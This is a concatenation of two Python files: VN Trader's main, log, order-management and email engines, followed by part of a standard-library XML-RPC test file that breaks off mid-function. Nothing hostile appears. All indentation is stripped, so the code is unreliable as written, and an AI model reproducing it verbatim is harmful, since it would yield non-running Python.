class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.exchanges = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = ""):
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get all names of gateways added in the main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self):
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str):
"""
Query history data from a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self):
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
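# Typical wiring of MainEngine (sketch only; SomeGateway, SomeApp and the setting
# dict are placeholders for concrete classes/values provided elsewhere):
#   main_engine = MainEngine()
#   main_engine.add_gateway(SomeGateway)             # a BaseGateway subclass
#   main_engine.add_app(SomeApp)                     # a BaseApp subclass
#   main_engine.connect({"API Key": "..."}, "SOME")  # gateway_name as registered
#   main_engine.close()                              # stops event engine, engines, gateways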
class BaseEngine(ABC):
"""
Abstract class for implementing a function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
print('log event register')
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from the dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
test_xmlrpc.py
|
import base64
import datetime
import decimal
import sys
import time
import unittest
from unittest import mock
import xmlrpc.client as xmlrpclib
import xmlrpc.server
import http.client
import http, http.server
import socket
import threading
import re
import io
import contextlib
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
try:
import gzip
except ImportError:
gzip = None
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary(b"my dog has fleas"),
'b64bytes': b"my dog has fleas",
'b64bytearray': bytearray(b"my dog has fleas"),
'boolean': False,
'unicode': '\u4000\u6000\u8000',
'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 2, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 2, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
dump = xmlrpclib.dumps((alist,))
load = xmlrpclib.loads(dump)
self.assertEqual(alist, load[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_builtin_types set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('20050210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('00010210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEqual(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxsize > 2**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MININT-1, dummy_write)
def test_dump_double(self):
xmlrpclib.dumps((float(2 ** 34),))
xmlrpclib.dumps((float(xmlrpclib.MAXINT),
float(xmlrpclib.MININT)))
xmlrpclib.dumps((float(xmlrpclib.MAXINT + 42),
float(xmlrpclib.MININT - 42)))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_double(xmlrpclib.MAXINT, dummy_write)
m.dump_double(xmlrpclib.MININT, dummy_write)
m.dump_double(xmlrpclib.MAXINT + 42, dummy_write)
m.dump_double(xmlrpclib.MININT - 42, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEqual(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_dump_encoding(self):
value = {'key\u20ac\xa4':
'value\u20ac\xa4'}
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15')
strg = "<?xml version='1.0' encoding='iso-8859-15'?>" + strg
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodresponse=True)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
methodname = 'method\u20ac\xa4'
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodname=methodname)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
self.assertEqual(xmlrpclib.loads(strg)[1], methodname)
def test_dump_bytes(self):
sample = b"my dog has fleas"
self.assertEqual(sample, xmlrpclib.Binary(sample))
for type_ in bytes, bytearray, xmlrpclib.Binary:
value = type_(sample)
s = xmlrpclib.dumps((value,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), bytes)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), xmlrpclib.Binary)
self.assertIsNone(m)
def test_loads_unsupported(self):
ResponseError = xmlrpclib.ResponseError
data = '<params><param><value><spam/></value></param></params>'
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><array>'
'<value><spam/></value>'
'</array></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><struct>'
'<member><name>a</name><value><spam/></value></member>'
'<member><name>b</name><value><spam/></value></member>'
'</struct></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
def check_loads(self, s, value, **kwargs):
dump = '<params><param><value>%s</value></param></params>' % s
result, m = xmlrpclib.loads(dump, **kwargs)
(newvalue,) = result
self.assertEqual(newvalue, value)
self.assertIs(type(newvalue), type(value))
self.assertIsNone(m)
def test_load_standard_types(self):
check = self.check_loads
check('string', 'string')
check('<string>string</string>', 'string')
check('<string>𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string</string>', '𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string')
check('<int>2056183947</int>', 2056183947)
check('<int>-2056183947</int>', -2056183947)
check('<i4>2056183947</i4>', 2056183947)
check('<double>46093.78125</double>', 46093.78125)
check('<boolean>0</boolean>', False)
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
xmlrpclib.Binary(b'\x00byte string\xff'))
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
b'\x00byte string\xff', use_builtin_types=True)
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
xmlrpclib.DateTime('20050210T11:41:23'))
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
datetime.datetime(2005, 2, 10, 11, 41, 23),
use_builtin_types=True)
check('<array><data>'
'<value><int>1</int></value><value><int>2</int></value>'
'</data></array>', [1, 2])
check('<struct>'
'<member><name>b</name><value><int>2</int></value></member>'
'<member><name>a</name><value><int>1</int></value></member>'
'</struct>', {'a': 1, 'b': 2})
def test_load_extension_types(self):
check = self.check_loads
check('<nil/>', None)
check('<ex:nil/>', None)
check('<i1>205</i1>', 205)
check('<i2>20561</i2>', 20561)
check('<i8>9876543210</i8>', 9876543210)
check('<biginteger>98765432100123456789</biginteger>',
98765432100123456789)
check('<float>93.78125</float>', 93.78125)
check('<bigdecimal>9876543210.0123456789</bigdecimal>',
decimal.Decimal('9876543210.0123456789'))
def test_get_host_info(self):
# see bug #3613, this raised a TypeError
transp = xmlrpc.client.Transport()
self.assertEqual(transp.get_host_info("user@host.tld"),
('host.tld',
[('Authorization', 'Basic dXNlcg==')], {}))
def test_ssl_presence(self):
try:
import ssl
except ImportError:
has_ssl = False
else:
has_ssl = True
try:
xmlrpc.client.ServerProxy('https://localhost:9999').bad_function()
except NotImplementedError:
self.assertFalse(has_ssl, "xmlrpc client's error with SSL support")
except OSError:
self.assertTrue(has_ssl)
def test_keepalive_disconnect(self):
class RequestHandler(http.server.BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
handled = False
def do_POST(self):
length = int(self.headers.get("Content-Length"))
self.rfile.read(length)
if self.handled:
self.close_connection = True
return
response = xmlrpclib.dumps((5,), methodresponse=True)
response = response.encode()
self.send_response(http.HTTPStatus.OK)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
self.handled = True
self.close_connection = False
def log_message(self, format, *args):
# don't clobber sys.stderr
pass
def run_server():
server.socket.settimeout(float(1)) # Don't hang if client fails
server.handle_request() # First request and attempt at second
server.handle_request() # Retried second request
server = http.server.HTTPServer((socket_helper.HOST, 0), RequestHandler)
self.addCleanup(server.server_close)
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join)
url = "http://{}:{}/".format(*server.server_address)
with xmlrpclib.ServerProxy(url) as p:
self.assertEqual(p.method(), 5)
self.assertEqual(p.method(), 5)
class SimpleXMLRPCDispatcherTestCase(unittest.TestCase):
class DispatchExc(Exception):
"""Raised inside the dispatched functions when checking for
chained exceptions"""
def test_call_registered_func(self):
"""Calls explicitly registered function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
def dispatched_func(*params):
raise self.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(dispatched_func)
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_instance_func(self):
"""Calls a registered instance attribute as a function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
class DispatchedClass:
def dispatched_func(self, *params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(DispatchedClass())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_dispatch_func(self):
"""Calls the registered instance's `_dispatch` function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_method = 'method'
exp_params = 1, 2, 3
class TestInstance:
def _dispatch(self, method, params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(
method, params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(TestInstance())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch(exp_method, exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_method, exp_params))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_registered_func_is_none(self):
"""Calls explicitly registered function which is None"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(None, name='method')
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_instance_has_no_func(self):
"""Attempts to call nonexistent function on a registered instance"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(object())
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_cannot_locate_func(self):
"""Calls a function that the dispatcher cannot locate"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEqual(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEqual(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
def test_dotted_attribute(self):
# this will raise AttributeError because code don't want us to use
# private methods
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
with mock.patch('time.localtime') as localtime_mock:
time_struct = time.struct_time(
[2013, 7, 15, 0, 24, 49, 0, 196, 0])
localtime_mock.return_value = time_struct
localtime = time.localtime()
t = xmlrpclib.DateTime()
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", localtime))
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %#x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t2, tref)
def test_comparison(self):
now = datetime.datetime.now()
dtime = xmlrpclib.DateTime(now.timetuple())
# datetime vs. DateTime
self.assertTrue(dtime == now)
self.assertTrue(now == dtime)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dtime)
self.assertTrue(dtime < then)
# str vs. DateTime
dstr = now.strftime("%Y%m%dT%H:%M:%S")
self.assertTrue(dtime == dstr)
self.assertTrue(dstr == dtime)
dtime_then = xmlrpclib.DateTime(then.timetuple())
self.assertTrue(dtime_then >= dstr)
self.assertTrue(dstr < dtime_then)
# some other types
dbytes = dstr.encode('ascii')
dtuple = now.timetuple()
self.assertFalse(dtime == 1970)
self.assertTrue(dtime != dbytes)
self.assertFalse(dtime == bytearray(dbytes))
self.assertTrue(dtime != dtuple)
with self.assertRaises(TypeError):
dtime < float(1970)
with self.assertRaises(TypeError):
dtime > dbytes
with self.assertRaises(TypeError):
dtime <= bytearray(dbytes)
with self.assertRaises(TypeError):
dtime >= dtuple
self.assertTrue(dtime == ALWAYS_EQ)
self.assertFalse(dtime != ALWAYS_EQ)
self.assertTrue(dtime < LARGEST)
self.assertFalse(dtime > LARGEST)
self.assertTrue(dtime <= LARGEST)
self.assertFalse(dtime >= LARGEST)
self.assertFalse(dtime < SMALLEST)
self.assertTrue(dtime > SMALLEST)
self.assertFalse(dtime <= SMALLEST)
self.assertTrue(dtime >= SMALLEST)
class BinaryTestCase(unittest.TestCase):
# XXX What should str(Binary(b"\xff")) return? I'm choosing "\xff"
# for now (i.e. interpreting the binary data as Latin-1-encoded
# text). But this feels very unsatisfactory. Perhaps we should
# only define repr(), and return r"Binary(b'\xff')" instead?
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = b'\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), str(d, "latin-1"))
def test_decode(self):
d = b'\x01\x02\x03abc123\xff\xfe'
de = base64.encodebytes(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), str(d, "latin-1"))
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), str(d, "latin-1"))
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None, encoding=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
class Fixture:
@staticmethod
def getData():
return '42'
class MyXMLRPCServer(xmlrpc.server.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
encoding=encoding,
logRequests=False, bind_and_activate=False)
try:
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x: x, 'têšt')
@serv.register_function
def my_function():
'''This is my function'''
return True
@serv.register_function(name='add')
def _(x, y):
return x + y
testInstance = TestInstanceClass()
serv.register_instance(testInstance, allow_dotted_names=True)
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(xmlrpc.server.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
